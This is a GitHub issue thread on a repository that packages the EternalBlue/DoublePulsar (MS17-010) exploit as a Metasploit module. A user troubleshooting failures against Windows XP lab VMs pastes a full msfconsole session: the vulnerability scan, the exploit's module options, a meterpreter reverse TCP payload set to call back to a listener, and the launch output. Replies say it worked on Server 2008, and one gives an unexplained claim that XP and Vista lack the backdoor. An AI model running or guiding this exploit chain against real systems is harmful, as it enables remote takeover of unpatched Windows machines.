Telefonica / Eternalblue-Doublepulsar-Metasploit

Metasploit module to exploit the Eternalblue-Doublepulsar vulnerability.
GNU Lesser General Public License v2.1
1.09k stars, 520 forks

Does not work on WinXP #67

BratE9000 closed 4 years ago

BratE9000 commented 6 years ago

I have tried everything in every open and closed issue. Has anyone gotten this to work on Windows XP?

I have tried three different versions of XP, all running in VirtualBox VMs. Two loaded straight from DVD with Service Pack 2 only. One from Windows 7 XP Mode. I have tried two different attack platforms (both Kali). I get the same thing every time.

If you have gotten it to work, please tell me what your target platform was and any different settings you may have used.

Thanks much!

msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > run

[+] 192.168.10.155:445    - Host is likely VULNERABLE to MS17-010!  (Windows 5.1)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
------- -----
msf auxiliary(smb_ms17_010) > use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > show options

Module options (exploit/windows/smb/eternalblue_doublepulsar):

Name                Current Setting                                  Required  Description
DOUBLEPULSARPATH    /root/Eternalblue-Doublepulsar-Metasploit/deps/  yes       Path directory of Doublepulsar
ETERNALBLUEPATH     /root/Eternalblue-Doublepulsar-Metasploit/deps/  yes       Path directory of Eternalblue
PROCESSINJECT       explorer.exe                                     yes       Name of process to inject into (Change to lsass.exe for x64)
RHOST               192.168.10.155                                   yes       The target address
RPORT               445                                              yes       The SMB service port (TCP)
TARGETARCHITECTURE  x86                                              yes       Target Architecture (Accepted: x86, x64)
WINEPATH            /root/.wine/drive_c/                             yes       WINE drive_c path

Payload options (windows/meterpreter/reverse_tcp):

Name      Current Setting  Required  Description
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST     192.168.10.190   yes       The listen address
LPORT     4444             yes       The listen port

Exploit target:

Id  Name
0   Windows XP (all services pack) (x86) (x64)
------ -------
msf exploit(eternalblue_doublepulsar) > exploit
[*] Started reverse TCP handler on 192.168.10.190:4444 
[*] 192.168.10.155:445 - Generating Eternalblue XML data
[*] 192.168.10.155:445 - Generating Doublepulsar XML data
[*] 192.168.10.155:445 - Generating payload DLL for Doublepulsar
[*] 192.168.10.155:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.10.155:445 - Launching Eternalblue...
[-] Error getting output back from Core; aborting...
[-] 192.168.10.155:445 - Are you sure it's vulnerable?
[*] 192.168.10.155:445 - Launching Doublepulsar...
[-] 192.168.10.155:445 - Oops, something was wrong!
[*] Exploit completed, but no session was created.
---- ----
BratE9000 commented 6 years ago

Vista Ultimate x64 from factory disk also doesn’t work. Server 2008 90-day trial worked for me first time, so I’m pretty sure my attack platform and settings are all in order.

BurntRouter commented 6 years ago

XP and Vista don't have the back door...